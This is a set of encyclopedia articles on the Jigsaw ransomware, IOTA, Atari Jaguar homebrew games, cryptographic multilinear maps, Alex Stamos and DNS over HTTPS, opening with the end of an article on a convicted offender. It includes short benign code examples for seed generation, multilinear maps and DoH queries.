Children and young people need to know how to report abuse through age appropriate relationships and sex education." Falder appealed against his sentence. On 16 October 2018, the Court of Appeal reduced the term of imprisonment to 25 years, with an extended licence of 8 years. A spokesperson for the University of Birmingham said, "The University is shocked to hear of the abhorrent crimes committed by a former post-doctoral researcher.” The University of Cambridge stated after the sentencing that they were "actively pursuing" ways of stripping Falder of his academic qualifications. The university could not say if there was a precedent of a removal process for its alumni. See also Sextortion Peter Scully References External links Falder's arrest video by the police No hiding place on dark web for criminals 1988 births Living people 21st-century English criminals Alumni of Clare College, Cambridge Academics of the University of Birmingham Criminals from Manchester Dark web English geophysicists English male criminals English people convicted of child sexual abuse English sex offenders People from Knutsford People educated at The King's School, Macclesfield Prisoners and detainees of England and Wales
56637698
https://en.wikipedia.org/wiki/Jigsaw%20%28ransomware%29
Jigsaw (ransomware)
Jigsaw is a form of encrypting ransomware malware created in 2016. It was initially titled "BitcoinBlackmailer" but later came to be known as Jigsaw due to featuring an image of Billy the Puppet from the Saw film franchise. The malware encrypts computer files and gradually deletes them unless a ransom is paid to decrypt the files. History Jigsaw was designed in April 2016 and released a week after creation. It was designed to be spread through malicious attachments in spam emails. Jigsaw is activated if a user downloads the malware programme, which encrypts all user files and the master boot record. Following this, a popup featuring Billy the Puppet appears with the ransom demand in the style of Saw's Jigsaw (one version including the "I want to play a game" line from the franchise) for Bitcoin in exchange for decrypting the files. If the ransom is not paid within one hour, one file is deleted. For each subsequent hour without a ransom payment, the number of files deleted increases exponentially, from a few hundred to thousands of files, until the computer is wiped after 72 hours. Any attempt to reboot the computer or terminate the process results in 1,000 files being deleted. A further updated version also threatens to dox the victim by revealing their personal information online. Jigsaw activates purporting to be either Firefox or Dropbox in the task manager. As the code for Jigsaw was written in the .NET Framework, it can be reverse-engineered to remove the encryption without paying the ransom. Reception The Register wrote that "Using horror movie images and references to cause distress in the victim is a new low." In 2017, it was listed among 60 versions of ransomware that utilised evasive tactics in their activation. References 2016 in computing Ransomware Saw (franchise)
56694947
https://en.wikipedia.org/wiki/IOTA%20%28technology%29
IOTA (technology)
IOTA is an open-source distributed ledger and cryptocurrency designed for the Internet of things (IoT). It uses a directed acyclic graph to store transactions on its ledger, motivated by potentially higher scalability than blockchain-based distributed ledgers. IOTA does not use miners to validate transactions; instead, nodes that issue a new transaction on the network must approve two previous transactions. Transactions can therefore be issued without fees, facilitating microtransactions. The network currently achieves consensus through a coordinator node, operated by the IOTA Foundation. As the coordinator is a single point of failure, the network is currently centralized. IOTA has been criticized for its unusual design, and it is unclear whether the design will work in practice. As a result, IOTA was rewritten from the ground up for a network update called Chrysalis, or IOTA 1.5, which launched on 28 April 2021. In this update, controversial design choices such as ternary encoding and quantum-proof cryptography were left behind and replaced with established standards. A testnet for a follow-up update called Coordicide, or IOTA 2.0, was deployed in late 2020, with the aim of releasing a distributed network that no longer relies on the coordinator for consensus in 2021. History The value transfer protocol IOTA, named after the smallest letter of the Greek alphabet, was created in 2015 by David Sønstebø, Dominik Schiener, Sergey Ivancheglo, and Serguei Popov. Initial development was funded by an online public crowdsale, with the participants buying the IOTA value token with other digital currencies. Approximately 1300 BTC were raised, corresponding to approximately US$500,000 at that time, and the total token supply was distributed pro-rata over the initial investors. The IOTA network went live in 2016.
IOTA foundation In 2017, early IOTA token investors donated 5% of the total token supply for continued development and to endow what later became the IOTA Foundation. In 2018, the IOTA Foundation was chartered as a Stiftung in Berlin, with the goal of assisting in the research and development, education and standardisation of IOTA technology. The IOTA Foundation is a board member of the International Association for Trusted Blockchain Applications (INATBA), and a founding member of the Trusted IoT Alliance and Mobility Open Blockchain Initiative (MOBI), to promote blockchain and distributed ledgers in regulatory approaches, the IoT ecosystem and mobility. Following a dispute between IOTA founders David Sønstebø and Sergey Ivancheglo, Ivancheglo resigned from the board of directors on 23 June 2019. On 10 December 2020 the IOTA Foundation Board of Directors and supervisory board announced that the Foundation had officially parted ways with David Sønstebø. DCI vulnerability disclosure On 8 September 2017, researchers Ethan Heilman from Boston University and Neha Narula et al. from MIT's Digital Currency Initiative (DCI) reported on potential security flaws with IOTA's former Curl-P-27 hash function. The IOTA Foundation received considerable backlash for its handling of the incident. FT Alphaville reported legal posturing by an IOTA founder against a security researcher for his involvement in the DCI report, as well as instances of aggressive language levelled against a Forbes contributor and other unnamed journalists covering the DCI report. The Centre for Blockchain Technologies at University College London severed ties with the IOTA Foundation due to legal threats against security researchers involved in the report. Attacks As a speculative blockchain and cryptocurrency-related technology, IOTA has been the target of phishing, scamming, and hacking attempts, which have resulted in thefts of user tokens and extended periods of downtime.
In January 2018, more than US$10 million worth of IOTA tokens were stolen from users who had used a malicious online seed-creator; the seed is a password that protects ownership of IOTA tokens. The seed-generator scam was the largest fraud in IOTA history to date, with over 85 victims. In January 2019, UK and German law enforcement agencies arrested a 36-year-old man from Oxford, England believed to be behind the theft. On 26 November 2019 a hacker discovered a vulnerability in a third-party payment service, provided by MoonPay, integrated in the mobile and desktop wallet managed by the IOTA Foundation. The attacker compromised over 50 IOTA seeds, resulting in the theft of approximately US$2 million worth of IOTA tokens. After receiving reports that hackers were stealing funds from user wallets, the IOTA Foundation shut down the coordinator on 12 February 2020. This had the side-effect of effectively shutting down the entire IOTA cryptocurrency. Users at risk were given seven days to migrate their potentially compromised seed to a new seed, until 7 March 2020. The coordinator was restarted on 10 March 2020. IOTA 1.5 (Chrysalis) and IOTA 2.0 (Coordicide) The IOTA network is currently centralized: a transaction on the network is considered valid if and only if it is referenced by a milestone issued by a node operated by the IOTA Foundation called the coordinator. In 2019 the IOTA Foundation announced that it would like to operate the network without a coordinator in the future, using a two-stage network update, termed Chrysalis for IOTA 1.5 and Coordicide for IOTA 2.0. The Chrysalis update went live on 28 April 2021, and removed controversial design choices such as ternary encoding and Winternitz one-time signatures, to create an enterprise-ready blockchain solution. In parallel, Coordicide is currently being developed, to create a distributed network that no longer relies on the coordinator for consensus.
A testnet of Coordicide was deployed in late 2020, with the aim of releasing a final version in 2021. Characteristics The Tangle The Tangle is the moniker used to describe IOTA's directed acyclic graph (DAG) transaction settlement and data integrity layer. It is structured as a string of individual transactions that are interlinked to each other and stored through a network of node participants. The Tangle does not have miners validating transactions; rather, network participants are jointly responsible for transaction validation, and must confirm two transactions already submitted to the network for every one transaction they issue. Transactions can therefore be issued to the network at no cost, facilitating micropayments. To avoid spam, every transaction requires computational resources based on Proof of Work (PoW) algorithms, to find the answer to a simple cryptographic puzzle. IOTA supports both value and data transfers. A second-layer protocol provides encryption and authentication of messages, or data streams, transmitted and stored on the Tangle as zero-value transactions. Each message holds a reference to the address of a follow-up message, connecting the messages in a data stream, and providing forward secrecy. Authorised parties with the correct decryption key can therefore follow a data stream only from their point of entry. When the owner of the data stream wants to revoke access, it can change the decryption key when publishing a new message. This gives the owner granular control over the way in which data is shared with authorised parties. IOTA token The IOTA token is a unit of value in the IOTA network. There is a fixed supply of 2,779,530,283,277,761 IOTA tokens in circulation on the IOTA network. IOTA tokens are stored in IOTA wallets protected by an 81-character seed, similar to a password. To access and spend the tokens, IOTA provides a cryptocurrency wallet.
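An 81-character seed of the kind described above is drawn from the 27-character tryte alphabet (the letters A-Z plus the digit 9). A minimal sketch of generating one with a cryptographically secure random number generator (illustrative only; weak, predictable generators of the kind behind the 2018 seed-creator scam are exactly what to avoid):

```python
import secrets

# IOTA (pre-Chrysalis) seeds: 81 characters from the tryte alphabet A-Z and 9.
# A CSPRNG must be used; a predictable generator makes the wallet trivially stealable.
TRYTE_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ9"

def generate_seed(length: int = 81) -> str:
    # secrets.choice draws from os-level randomness, unlike random.choice
    return "".join(secrets.choice(TRYTE_ALPHABET) for _ in range(length))

seed = generate_seed()  # 81 characters, each one of A-Z or 9
```

This only sketches the character-set and length constraints; real wallets additionally derive addresses and signing keys from the seed.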
A hardware wallet can be used to keep credentials offline while facilitating transactions. As of 8 December 2021, each IOTA token has a value of $1.17, giving the cryptocurrency a market capitalisation of $3.26bn, according to CoinMarketCap data. Coordinator node IOTA currently requires a majority of honest actors to prevent network attacks. However, as the concept of mining does not exist on the IOTA network, it is unlikely that this requirement will always be met. Therefore, consensus is currently obtained through referencing of transactions issued by a special node operated by the IOTA Foundation, called the coordinator. The coordinator issues zero-value transactions at given time intervals, called milestones. Any transaction, directly or indirectly, referenced by such a milestone is considered valid by the nodes in the network. The coordinator is an authority operated by the IOTA Foundation and as such a single point of failure for the IOTA network, which makes the network centralized. Markets IOTA is traded in megaIOTA units (1,000,000 IOTA) on digital currency exchanges such as Bitfinex, and listed under the MIOTA ticker symbol. Like other digital currencies, IOTA's token value has soared and fallen. Fast Probabilistic Consensus (FPC) The crux of cryptocurrencies is to stop double spends, the ability to spend the same money twice in two simultaneous transactions. Bitcoin's solution has been to use Proof of Work (PoW), making it a significant financial burden to have a minted block be rejected for a double spend. IOTA has designed a voting algorithm called Fast Probabilistic Consensus (FPC) to form a consensus on double spends. Instead of starting from scratch, the IOTA Foundation started with Simple Majority Consensus (SMC), where the first opinion update is defined by s_i(1) = 1 if η_i(0) ≥ τ, and s_i(1) = 0 otherwise, where s_i(t) is the opinion of node i at time t, η_i(t) is the fraction of all the nodes that hold opinion 1, and τ is the threshold for majority, set by the implementation.
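The first-round majority update can be sketched as a small simulation in which each node observes the opinions of a sample of nodes and adopts opinion 1 when the observed fraction reaches the threshold. The sample size k and threshold tau below are arbitrary illustration values, and the random sampling is an illustrative simplification rather than the exact protocol specification:

```python
import random

# One opinion-update round in the style of Simple Majority Consensus:
# every node observes the opinions of k sampled nodes and sets its own
# opinion to 1 when the observed fraction eta reaches the threshold tau.
# Parameters are illustrative, not taken from the protocol specification.

def update_round(opinions, k=10, tau=0.5):
    new_opinions = []
    for _ in opinions:
        sample = random.choices(opinions, k=k)
        eta = sum(sample) / k  # fraction of sampled nodes holding opinion 1
        new_opinions.append(1 if eta >= tau else 0)
    return new_opinions

# With a clear initial majority, repeated rounds drive the network toward unanimity.
ops = [1] * 80 + [0] * 20
for _ in range(10):
    ops = update_round(ops)
```

Repeating the round amplifies an initial majority; the fragility discussed next arises when attackers keep the network balanced near the threshold.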
After the first round, the opinion at time t+1 is updated by the same rule, s_i(t+1) = 1 if η_i(t) ≥ τ, and 0 otherwise. However, this model is fragile against malicious attackers, which is why the IOTA Foundation decided not to use it. Instead, the IOTA Foundation decided to augment the leaderless consensus mechanism called Random neighbors majority consensus (RMC), which is similar to SMC except that the nodes whose opinions are queried are randomized. They took RMC and augmented it to create FPC by having the threshold of majority be a random number generated from a Decentralized Random Number Generator (dRNG). For FPC, the first round is the same, s_i(1) = 1 if η_i(0) ≥ τ, and 0 otherwise. For successive rounds, though, s_i(t+1) = 1 if η_i(t) ≥ U_t, and 0 otherwise, where U_t is a randomized threshold for majority. Randomizing the threshold for majority makes it extremely difficult for adversaries to manipulate the consensus by either making it converge to a specific value or prolonging consensus. Note that FPC is only utilized to form consensus on a transaction during a double spend. Ultimately, IOTA uses Fast Probabilistic Consensus for consensus and uses Proof of Work as a rate controller. Because IOTA does not use PoW for consensus, its overall network energy use per transaction is extremely small. Applications and testbeds Proof-of-concepts building on IOTA technology are being developed in the automotive and IoT industries by corporations such as Jaguar Land Rover, STMicroelectronics and Bosch. IOTA is a participant in smart city testbeds, to establish digital identity, waste management and local trade of energy. In project Alvarium, formed under the Linux Foundation, IOTA is used as an immutable storage and validation mechanism. The privacy-centered search engine Xayn uses IOTA as a trust anchor for its aggregated AI model. On 11 February 2020, the Eclipse Foundation and IOTA Foundation jointly launched the Tangle EE (Enterprise Edition) Working Group.
Tangle EE is aimed at enterprise users that can take IOTA technology and enable larger organizations to build applications on top of the project, with the Eclipse Foundation providing a vendor-neutral governance framework. Announcements of partners were critically received. In 2017, IOTA released the data marketplace, a pilot for a market where connected sensors or devices can store, sell or purchase data. The data marketplace was received critically by the cryptocurrency community over the extent of the involvement of its participants, with suggestions that "the IOTA Foundation was actively asking publications to use Microsoft's name following the data marketplace announcement." Izabella Kaminska criticized a Jaguar press release: "our interpretation is that it's very unlikely Jaguar will be bringing a smart-wallet-enabled marketplace any time soon." Criticism IOTA promises to achieve the same benefits that blockchain-based DLTs bring - decentralization, distribution, immutability and trust - but remove the downsides of wasted resources associated with mining as well as transaction costs. However, several of the design features of IOTA are unusual, and it is unclear whether they work in practice. The security of IOTA's consensus mechanism against double-spending attacks is unclear, as long as the network is immature. Essentially, in the IoT, where heterogeneous devices have varying levels of low computational power, an attacker with sufficiently strong computational resources could render the tangle insecure. This is a problem in traditional proof-of-work blockchains as well; however, they provide a much greater degree of security through higher fault tolerance and transaction fees. At the beginning, when there is a lower number of participants and incoming transactions, a central coordinator is needed to prevent an attack on the IOTA tangle. Critics have opposed the role of the coordinator for being the single source of consensus in the IOTA network.
Polychain Capital founder Olaf Carlson-Wee says "IOTA is not decentralized, even though IOTA makes that claim, because it has a central "coordinator node" that the network needs to operate. If a regulator or a hacker shut down the coordinator node, the network would go down." This was demonstrated during the Trinity attack incident, when the IOTA Foundation shut down the coordinator to prevent further thefts. Following a discovered vulnerability in October 2017, the IOTA Foundation transferred potentially compromised funds to addresses under its control, providing a process for users to later apply to the IOTA Foundation in order to reclaim their funds. Additionally, IOTA has seen several network outages as a result of bugs in the coordinator as well as DDoS attacks. During the seed-generator scam, a DDoS network attack was abused, leaving initial thefts undetected. In 2020, the IOTA Foundation announced that it would like to operate the network without a coordinator in the future, but implementation of this is still in an early development phase. References External links Official website Cryptocurrency projects Directed acyclic graphs
56822102
https://en.wikipedia.org/wiki/List%20of%20Atari%20Jaguar%20homebrew%20games
List of Atari Jaguar homebrew games
This is a list of titles for the Atari Jaguar and its CD add-on developed and released by independent developers and publishers. Many of the games present here have been released long after the end of the console's official life span in 1996, with the last officially licensed title released in 1998. Consequently, these homebrew games are not endorsed or licensed by Atari. After the properties of Atari Corporation were bought out by Hasbro Interactive in 1998, the rights and patents to the Jaguar were released into the public domain in 1999, declaring the console an open platform and opening the doors for homebrew development. Thanks to this, a few developers and publishers such as AtariAge, B&C Computervisions, Piko Interactive, Songbird Productions and Video61 continue to release previously unfinished games from the Jaguar's past life cycle, as well as new titles, to satisfy the system's cult following to date. Homebrew games for the Atari Jaguar are released in cartridge format, CD format, or both. Titles released in the CD format are either glass-mastered or burned onto regular CD-Rs; however, since the add-on was released in very limited quantities, most homebrew developers publish their works either online on forums or on cartridge via independent publishers. Many of the cartridge releases are styled as retail Jaguar titles from the era. As both systems do not enforce regional locking, all titles are region-free, but some titles, such as Gorf Classic and the initial release of Black Out!, do not work correctly on PAL systems. Some of the earliest CD releases were not encrypted, requiring either B&C's Jaguar CD Bypass Cartridge or Reboot's Jagtopia (Freeboot) program burned onto a CD in order to run unencrypted CD games; however, Curt Vendel of Atari Museum released the binaries and encryption keys for both cartridge and CD formats, making it possible to run games without the need for development hardware.
The first homebrew title programmed for the Jaguar dates back to 1995: a Jaguar version of Tetris called JSTetris (often referred to as Jaguar Tetris or JagTris), developed using a hacked Jaguar (BJL, with the ROM replaced by custom software). The following list includes all of the post-release titles as of 2018, as well as homebrew games and demos made by the community. There has been an increase in the number of homebrew games released for the Jaguar in recent years, starting in 2016; 2017 saw the highest number of new titles released for the system since 1998. Post-release homebrew games Homebrew games and demos These are small games and demos made by multiple members and groups of the Jaguar homebrew community: Atari_Owl The Owl Project BadCoder BadCode0 BadCode1 BadCode2 BadCode3 BadCode4 BadCode4 C BadCode4 (Metal) BadCode4 (New Metal) Bastian "42bs" Schick JSTetris (1995) Mandelbrot Demo (1997) Bitjag Portland Retro Gaming Expo 2014 Welcome Demo Cedric "Orion" Bourse Diamjag Jungle Jag Lines Osmozys Retro-Gaming Connexion 2006 (demo) Sprite Checkpoint Embrace The Plasma (demo) j_ (demo) Morphonic Lab XIII: Contarum (demo) Sillyventure 2013 Invitation (demo) Christopher "Ninjabba" Vick The Maxx (demo) Chris "JagChris/A31Chris" Contreras Bomber Vs. Fighter Chris "atari2600land" Read Ants Stickman Clint "Mindthreat" Thompson Aurora64 Screen Saver (demo) The CAR Demo Dragonox (demo) Fish Fest Fury Jaguar Jukebox Midsummer Dreams S1M0N3 Space Defense: Project 1196 DrTypo Fallen Angels Fallen Angels Demo GemRace Shoot'em Up Tube Tube Second Edition Voxel Engine (demo) David "GT Turbo" Brylka Project Apocalypse Fadest Black Hole Dazed VS Project W S.P.A.C.E. Force Design Black Jag: Hyper Power League (demo) Legion Force Jidai: The Next Era!
(demo) Fréderic "FrediFredo" Moreau Jaguar Hockey Legends '13 The Wolfenite Mine Graeme "LinkoVitch" Hinchliffe Reactris Holger Hannig JagCube (demo) JagPattern (demo) JagNes JagNes Invitation (demo) James "edarkness1" Garvin The Assassin (demo) Dark Guardian Episode 1: Unknown Enemy (demo) Jason "Zetanyx/MegaData" Data Native Spirit Jeff "rush6432" Nihlean Arkanna (demo) Pong Zero (demo) Kevin "sh3-rg" Dempsey Bexagon Blue KNIGHT\White Horse Boingy Uppy μFLY Lars "Starcat" Hieronymus Eerievale (demo) EJagfest 2000 (demo) HalMock FurBall - Sink or Swim Jaguar Development Club #1 (demo) Jaguar Development Club #2 (demo) JaguarMIND: Bomb Squad JagWorm Juiced Lost Treasures Ocean Depths Starcat Developments Demo Mark "GroovyBee" Ball Duckie Egg Mars Rover (demo) Moles Star Raiders (ST-to-Jaguar port) Matthieu "Matmook" Barreteau Dance Dance Xirius Space Party Do The Same Ladybugged The Quest Matthias "mdgames" Domin Balloon Clicks! Colors (demo) ColMouse JagMania JagMarble Mike "Tursi" Brent JagLion JagRotate Martian Attack OMF Kaboom Reboot Beebris Bad Apple (demo) Cloudy With A Chance Of Meatballs (demo) Degz Doger (demo) Downfall Expressway Full Circle: Rocketeer Promo Half Circle 8bitter HMS Raptor Kobayashi Maru Particle Playtime (demo) Project One Project Two Rocks Off! SuperFly DX Shit's Frozen 64 (demo) Tripper Getem (demo) Wiggle (demo) Robert Jurziga Drumpad Drumpad 2 Hubble Fade Hubble Nebula JSS Demo JSS Demo 2 PAULA Preview Demo PAULA Preview Demo 2 Sébastien "SebRmv" Briais Atomic Sebastian Mihai Jagmatch Steven "GORF" Scavone UFO (demo) Surrounded! Swapd0 Frontier: Elite II (ST-to-Jaguar port) Toarnold 2048 Gryzzles Vladimir "VladR" Repisky H.E.R.O. (demo) Klax3D S.T.U.N. Runner (demo) See also List of Atari Jaguar games List of cancelled Atari Jaguar games Lists of video games References Homebrew software Video game development Atari Jaguar
56835844
https://en.wikipedia.org/wiki/Cryptographic%20multilinear%20map
Cryptographic multilinear map
A cryptographic n-multilinear map is a kind of multilinear map, that is, a function e : G1 × ... × Gn → GT such that for any integers a1, ..., an and elements gi ∈ Gi, e(g1^a1, ..., gn^an) = e(g1, ..., gn)^(a1 ... an), and which in addition is efficiently computable and satisfies some security properties. It has several applications in cryptography, such as key exchange protocols, identity-based encryption, and broadcast encryption. There exist constructions of cryptographic 2-multilinear maps, known as bilinear maps; however, the problem of constructing such multilinear maps for n > 2 seems much more difficult, and the security of the proposed candidates is still unclear. Definition For n = 2 In this case, multilinear maps are mostly known as bilinear maps or pairings, and they are usually defined as follows: Let G1 and G2 be two additive cyclic groups of prime order q, and GT another cyclic group of order q written multiplicatively. A pairing is a map e : G1 × G2 → GT which satisfies the following properties: Bilinearity For all a, b ∈ Zq, P ∈ G1 and Q ∈ G2, e(aP, bQ) = e(P, Q)^(ab). Non-degeneracy If P and Q are generators of G1 and G2, respectively, then e(P, Q) is a generator of GT. Computability There exists an efficient algorithm to compute e. In addition, for security purposes, the discrete logarithm problem is required to be hard in both G1 and G2. General case (for any n) We say that a map e : G1 × ... × Gn → GT is an n-multilinear map if it satisfies the following properties: All Gi (for i = 1, ..., n) and GT are groups of the same order; if a1, ..., an ∈ Z and (g1, ..., gn) ∈ G1 × ... × Gn, then e(g1^a1, ..., gn^an) = e(g1, ..., gn)^(a1 ... an); the map is non-degenerate in the sense that if g1, ..., gn are generators of G1, ..., Gn, respectively, then e(g1, ..., gn) is a generator of GT; There exists an efficient algorithm to compute e. In addition, for security purposes, the discrete logarithm problem is required to be hard in G1, ..., Gn. Candidates All the candidate multilinear maps are actually slight generalizations of multilinear maps known as graded-encoding systems, since they allow the map to be applied partially: instead of being applied to all the values at once, which would produce a value in the target set GT, it is possible to apply it to some values, which generates values in intermediate target sets. For example, for n = 3, it is possible to compute y = e(g1^a1, g2^a2) first and then e(y, g3^a3).
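The multilinearity law and the graded (partial) application described above can be sanity-checked with a toy model. In this sketch, which is an illustration invented for this text and not any of the candidate constructions, every group element gi^a is represented directly by its exponent a mod q; this makes the map trivially computable, and also trivially insecure, since discrete logarithms can then be read off for free:

```python
from functools import reduce

q = 101  # common prime order of G1, ..., Gn and GT

def e(*exponents):
    # Toy n-multilinear map in "exponent space": the element gi^ai is
    # represented by ai, and e returns the exponent of the target-group
    # element gT^(a1 * ... * an).
    return reduce(lambda x, y: (x * y) % q, exponents, 1)

a1, a2, a3 = 7, 12, 33
c = 5

# Multilinearity: e(g1^(c*a1), g2^a2, g3^a3) = e(g1^a1, g2^a2, g3^a3)^c.
# In exponent space, "raising to the power c" is multiplication by c.
assert e((c * a1) % q, a2, a3) == (c * e(a1, a2, a3)) % q

# Graded application: pairing two inputs first and then the third gives
# the same result as applying the map to all three values at once.
assert e(e(a1, a2), a3) == e(a1, a2, a3)
```

The real candidates replace this trivial representation with hard-to-invert encodings (ideals of polynomial rings in GGH13, integers in CLT13) precisely so that the exponents cannot be recovered from the encoded values.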
The three main candidates are GGH13, which is based on ideals of polynomial rings; CLT13, which is based on the approximate GCD problem and works over the integers, and hence is supposed to be easier to understand than the GGH13 multilinear map; and GGH15, which is based on graphs. References Cryptography Multilinear algebra
56886069
https://en.wikipedia.org/wiki/Alex%20Stamos
Alex Stamos
Alex Stamos is a Greek American computer scientist and adjunct professor at Stanford University's Center for International Security and Cooperation. He is the former chief security officer (CSO) at Facebook. His planned departure from the company, following disagreement with other executives about how to address the Russian government's use of its platform to spread disinformation during the 2016 U.S. presidential election, was reported in March 2018. Early life Stamos grew up in Fair Oaks, California and graduated from Bella Vista High School in 1997. Stamos attended the University of California, Berkeley, where he graduated in 2001 with a degree in EECS. Career Stamos began his career at Loudcloud and, later, worked as a security consultant at @stake. iSEC Partners In 2004, Stamos co-founded iSEC Partners, a security consulting firm, with Joel Wallenstrom, Himanshu Dwivedi, Jesse Burns and Scott Stender. During his time at iSEC Partners, Stamos was well known for his research publications on vulnerabilities in forensics software and macOS, Operation Aurora, and security ethics in the post-Snowden era. Stamos was an expert witness for a number of cases involving digital privacy, encryption, and free speech: EFF for their lawsuit against Sony BMG Google for their Google Street View case George Hotz Aaron Swartz iSEC Partners was acquired by NCC Group in 2010. Artemis Internet Following the acquisition of iSEC Partners by NCC Group, Stamos became the CTO of Artemis Internet, an internal startup at NCC Group. Artemis Internet petitioned ICANN to host a '.secure' gTLD on which all services would be required to meet minimum security standards. Artemis ultimately acquired the right to operate the '.trust' gTLD from Deutsche Post to launch its services. Stamos filed and received five patents for his work at Artemis Internet. Yahoo! In 2014, Stamos joined Yahoo! as CSO.
While at Yahoo!, he testified to Congress on online advertising and its impact on computer security and data privacy. He publicly challenged NSA Director Michael S. Rogers on the subject of encryption backdoors in February 2015 at a cybersecurity conference hosted by New America. Facebook In 2015, Stamos joined Facebook as CSO. During his time at Facebook, Stamos co-authored a whitepaper (with Jen Weedon and Will Nuland) on the use of social media to attack elections. He later delivered a keynote address at the Black Hat Briefings in 2017 on the need to broaden the definition of security and diversify the cybersecurity industry. Following disagreement with other executives about how to address the Russian government's use of its platform to spread disinformation during the 2016 U.S. presidential election, he made plans in 2018 to leave the company to take a research professorship at Stanford University. Stamos was interviewed about the Russian interference in the 2016 United States elections in the PBS Frontline documentary The Facebook Dilemma. Controversies During Stamos's tenure as the Chief Security Officer, Facebook was involved in numerous safety and security controversies, including the Russian interference in the 2016 United States elections, failure to remove reported child-abuse images, inaction against disinformation campaigns in the Philippines that targeted and harassed journalists, the Facebook–Cambridge Analytica data scandal and the Rohingya genocide, for which the company has played a "determining role" according to the UN. Stamos said that, as the CSO during the 2016 election season, he "deserve[s] as much blame (or more) as any other exec at the company" for Facebook's failed response to the Russian interference. Although the whitepaper Stamos co-authored only mentioned $100,000 in ad spend for 3,000 ads connected to about 470 inauthentic accounts, it was later revealed that the Russian influence had reached 126 million Facebook users.
While Cambridge Analytica harvested data from 87 million Facebook users before Stamos's tenure, Facebook did not notify its users until 2018, despite knowing about it as early as 2015, the year Stamos joined the company as the CSO. In July 2019, Facebook agreed to pay $100 million to settle with the U.S. Securities and Exchange Commission for misleading investors for more than two years (2015-2018) about the misuse of its users' data. Stanford University Stanford University's Center for International Security and Cooperation lists Stamos as an adjunct professor, visiting scholar at the Hoover Institution, and director of the Stanford Internet Observatory. Krebs Stamos Group At the beginning of 2021, Stamos joined former CISA director Chris Krebs to form Krebs Stamos Group, a cybersecurity consultancy, which quickly landed its first customer, the recently beleaguered SolarWinds. References Patents Securing client connections, filed April 11, 2012, granted July 14, 2015 Domain policy specification and enforcement, filed April 11, 2012, granted August 5, 2014 Computing resource policy regime specification and verification, filed May 9, 2014, granted August 11, 2014 Assessing a computing resource for compliance with a computing resource policy regime specification, filed May 9, 2014, granted March 24, 2015 Discovery engine, filed May 9, 2014, granted February 16, 2016 External links Alex Stamos on Twitter Krebs Stamos Group official web site Year of birth missing (living people) Chief security officers Facebook employees Living people MSNBC people Place of birth missing (living people) People associated with computer security University of California, Berkeley alumni Yahoo! employees
56903929
https://en.wikipedia.org/wiki/DNS%20over%20HTTPS
DNS over HTTPS
DNS over HTTPS (DoH) is a protocol for performing remote Domain Name System (DNS) resolution via the HTTPS protocol. A goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data in man-in-the-middle attacks, using HTTPS to encrypt the data between the DoH client and the DoH-based DNS resolver. By March 2018, Google and the Mozilla Foundation had started testing versions of DNS over HTTPS. In February 2020, Firefox switched to DNS over HTTPS by default for users in the United States. An alternative to DoH is the DNS over TLS (DoT) protocol, a similar standard for encrypting DNS queries, differing only in the methods used for encryption and delivery. Whether either protocol is superior with respect to privacy and security remains a matter of debate, and some argue that the merits of either depend on the specific use case. Technical details DoH is a proposed standard, published as RFC 8484 (October 2018) by the IETF. It uses HTTP/2 and HTTPS, and carries wire-format DNS data, as returned in existing UDP responses, in an HTTPS payload with the MIME type application/dns-message. If HTTP/2 is used, the server may also use HTTP/2 server push to send values that it anticipates the client may find useful in advance. DoH is a work in progress. Even though the IETF has published RFC 8484 as a proposed standard and companies are experimenting with it, the IETF has yet to determine how it should best be implemented. The IETF is evaluating a number of approaches for how best to deploy DoH and is looking to set up a working group, Adaptive DNS Discovery (ADD), to do this work and develop a consensus.
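The wire format described above can be illustrated with a minimal sketch (the endpoint path shown is the conventional /dns-query template; the helper names are this text's own) that builds a DNS query for an A record and encodes it the way an RFC 8484 GET request carries it, as unpadded base64url in the "dns" query parameter:

```python
import base64
import struct

def build_dns_query(name, qtype=1, qclass=1):
    # 12-byte DNS header: ID=0 (RFC 8484 recommends ID 0 for HTTP cache
    # friendliness), flags=0x0100 (recursion desired), 1 question,
    # 0 answer/authority/additional records.
    header = struct.pack(">HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    # QNAME: length-prefixed labels, terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.split(".")
    ) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, qclass)

def doh_get_path(wire):
    # GET requests carry the wire-format query as base64url without padding.
    return "/dns-query?dns=" + base64.urlsafe_b64encode(wire).rstrip(b"=").decode()

wire = build_dns_query("example.com")  # qtype=1 requests an A record
print(doh_get_path(wire))
```

A POST request would instead send the wire-format bytes directly as the request body with Content-Type: application/dns-message, the MIME type mentioned above.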
In addition, other industry working groups, such as the Encrypted DNS Deployment Initiative, have been formed to "define and adopt DNS encryption technologies in a manner that ensures the continued high performance, resiliency, stability and security of the Internet's critical namespace and name resolution services, as well as ensuring the continued unimpaired functionality of security protections, parental controls, and other services that depend upon the DNS". Since DoH cannot be used under some circumstances, like captive portals, web browsers like Firefox can be configured to fall back to insecure DNS. Oblivious DNS-over-HTTPS Oblivious DoH is an Internet Draft proposing a protocol extension to ensure that no single DoH server is aware of both the client's IP address and their message contents. All requests are passed via a proxy, hiding clients' addresses from the resolver itself, and are encrypted to hide their contents from the proxy. Deployment scenarios DoH is used for recursive DNS resolution by DNS resolvers. Resolvers (DoH clients) must have access to a DoH server hosting a query endpoint. Three usage scenarios are common: Using a DoH implementation within an application: Some browsers have a built-in DoH implementation and can thus perform queries by bypassing the operating system's DNS functionality. A drawback is that an application may not inform the user if it skips DoH querying, either due to misconfiguration or lack of support for DoH. Installing a DoH proxy on the name server in the local network: In this scenario, client systems continue to use traditional (port 53 or 853) DNS to query the name server in the local network, which then gathers the necessary replies via DoH by reaching DoH servers on the Internet. This method is transparent to the end user. Installing a DoH proxy on a local system: In this scenario, operating systems are configured to query a locally running DoH proxy.
